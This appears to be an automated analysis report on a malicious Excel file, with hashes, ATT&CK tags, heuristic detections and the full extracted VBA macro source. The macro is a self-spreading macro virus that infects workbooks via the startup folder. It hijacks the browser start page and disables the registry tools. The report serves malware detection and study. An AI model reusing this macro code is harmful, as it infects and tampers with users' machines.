Office (OLE) malware analysis — malicious · f49f975b4efe4e92

MALICIOUS

Office (OLE)

40.0 KB Created: 2015-06-05 07:53:56 Authoring application: Microsoft Excel First seen: 2015-09-17

MD5: 2d0b57cbf89ecdd2b2ebf74797a865e0 SHA-1: 64da3af7e047fafd63f52324846f2a4d6faff1ae SHA-256: f49f975b4efe4e9265b4a43fa616e293e5134b919cb4a4f29e2aa2a21c6a17e5

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This Excel document contains VBA macros, including an Auto_Open macro, which is designed to execute automatically when the document is opened. The macros utilize WScript.Shell to create objects and execute commands, indicating an attempt to download and run a secondary payload. The presence of WScript.Shell usage and the auto-execution mechanism strongly suggest a malicious intent to compromise the system.

Heuristics 8

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2368 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2368 bytes
SHA-256: `f5e38f7da0efd812d64e7c030b4a9b455f93315ad51586e53716b2d8c483f66e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KING" Sub auto_open() Application.OnSheetActivate = "ck_files" End Sub Sub ck_files() c$ = Application.StartupPath m$ = Dir(c$ & "\" & "KING.XLS") 'results If m$ = "KING.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name Sheets("KING").Visible = True Sheets("KING").Select Sheets("KING").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("KING").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).name If s$ <> "KING" Then Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("KING").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case Else End Select Dim OperationRegistry On Error Resume Next Set OperationRegistry = CreateObject("WScript.Shell") MyUrl = "http://3azu.taobao.com" RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" OperationRegistry.RegWrite RegPath, "1", "REG_DWORD" Exit Sub '正常运行的话会在这里退出程序 End Sub

SHA-256: f5e38f7da0efd812d64e7c030b4a9b455f93315ad51586e53716b2d8c483f66e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KING"




Sub auto_open()
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.